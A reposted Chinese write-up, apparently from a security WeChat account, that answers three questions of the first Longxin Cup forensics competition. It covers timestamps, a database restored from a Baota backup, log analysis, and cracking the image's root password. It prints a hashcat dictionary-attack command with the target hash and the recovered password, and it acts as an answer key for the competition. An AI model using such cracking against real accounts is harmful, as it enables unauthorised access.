第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

先把时间转成时间戳,转的时候注意一下题目给的UTC+8,表的时间戳是UTC,建仓时间和平仓时间分别为16461314411646131921

第一届龙信杯电子数据取证竞赛Writeup

11.请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。(标准格式:2022-1-11.1:22:43)

1639014743
  • 1

直接查不到

第一届龙信杯电子数据取证竞赛Writeup

宝塔看了一下有备份文件

第一届龙信杯电子数据取证竞赛Writeup

以防万一先别直接覆盖掉,sql文件下下来然后重新建个库导进去

第一届龙信杯电子数据取证竞赛Writeup

有了

第一届龙信杯电子数据取证竞赛Writeup

12.宝塔面板某用户曾尝试进行一次POST请求,参数为“/BTCloud?action=UploadFilesData”,请问该用户疑似使用的( )电脑系统进行访问请求的。

A.Windows 8.1

B.Windows 10

C.Windows 11

D.Windows Server 2000

A
  • 1

这个目录下一堆日志

第一届龙信杯电子数据取证竞赛Writeup

不嫌麻烦也没几个就手动翻过去,嫌麻烦就写个bash脚本一次性都解压了 ,然后搜一下

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

13.请分析该服务器镜像最高权限“root”账户的密码是_______。(标准格式:a123456)

g123123
  • 1

hashcat直接爆rockyou,答辩的时候说是非预期hhh,暂未想到什么预期做法

hashcat  -a 0 $1$kmYU/aog$fKIF3ugewwCTuPWOSksjD/ rockyou.txt --force --self-test-disable
  • 1

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

点点关注不迷路第一届龙信杯电子数据取证竞赛Writeup

喜欢的看官还请多多点赞第一届龙信杯电子数据取证竞赛Writeup收藏第一届龙信杯电子数据取证竞赛Writeup

推荐阅读 

【2023HW】|24-8.24(HW攻防演练笔记)

【2023HW】|23-8.23(“苕皮哥”来龙去脉,HW最后一天的瓜)

【2023HW】|22-8.22(HW七夕专刊,你守护爱情,我守护网络安全)

【2023HW】|20-8.20(为黑客立命,为白帽立心,为安全继绝学,为网安开太平)

【2023HW】|19-8.19 (真延期了吗)

【2023HW】|18-8.18 (9号以来0day漏洞整理)

【2023HW】|17-8.17(红队被溯源到,怎么办 ?)

【2023HW】|16-8.16(正式进入混打阶段,0day出手)

【2023HW】|15-8.15(客户被打穿,蓝队高级紧急招人)

【2023HW】|14-8.14

【2023HW】|13-8.12(企业微信爆出0day、吴*钓鱼木马)

【2023HW】|12-8.10

【2023HW】|10-8.10

2023HVV,9号9点,开始?!(文末蓝队必杀技能)

【Hacking黑白红】,一线渗透攻防实战交流公众号

第一届龙信杯电子数据取证竞赛Writeup

回复“电子书”获取web渗透、CTF电子书:

回复“视频教程”获取渗透测试视频教程;  

回复“内网书籍”获取内网学习书籍;        

回复“CTF工具”获取渗透、CTF全套工具;

回复“内网渗透;获取内网渗透资料;

回复护网;获取护网学习资料 ;

回复python,获取python视频教程;

回复java,获取Java视频教程;

回复go,获取go视频教程

知识星球

【Hacking藏经阁】知识星球致力于分享技术认知

1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;

400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)

2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。

如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。

欢迎加入99米/年,平均每天2毛7分钱,学习网络安全一整年。

第一届龙信杯电子数据取证竞赛Writeup

渗透实战系列

【渗透实战系列】51|- 一次BC站点的GetShell过程

【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇

【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置

【渗透实战系列】|48-一次内网渗透

渗透实战系列】|47-记一次对某鱼骗子卖家的溯源

【渗透实战系列】|46-渗透测试:从Web到内网

【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)

【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战

【渗透实战系列】|41-记一次色*情app渗透测试

【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)

【渗透实战系列】|38-对某色情直播渗透

【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

【渗透实战系列】|36-一次bc推广渗透实战

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

【渗透实战系列】|31-记一次对学校的渗透测试

【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】|29-实战|对某勒索APP的Getshell

【渗透实战系列】|28-我是如何拿下BC站的服务器

【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

【渗透实战系列】|26一记某cms审计过程(步骤详细)

【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

【渗透实战系列】|23-某菠菜网站渗透实战

【渗透实战系列】|22-渗透系列之打击彩票站

【渗透实战系列】|21一次理财杀猪盘渗透测试案例

【渗透实战系列】|20-渗透直播网站

【渗透实战系列】|19-杀猪盘渗透测试

【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

第一届龙信杯电子数据取证竞赛Writeup

长按-识别-关注

第一届龙信杯电子数据取证竞赛Writeup

Hacking黑白红

一个专注信息安全技术的学习平台

第一届龙信杯电子数据取证竞赛Writeup

点分享

第一届龙信杯电子数据取证竞赛Writeup

点收藏

第一届龙信杯电子数据取证竞赛Writeup

点点赞

第一届龙信杯电子数据取证竞赛Writeup

点在看

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月23日06:38:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第一届龙信杯电子数据取证竞赛Writeuphttp://cn-sec.com/archives/2086148.html

发表评论

匿名网友 填写信息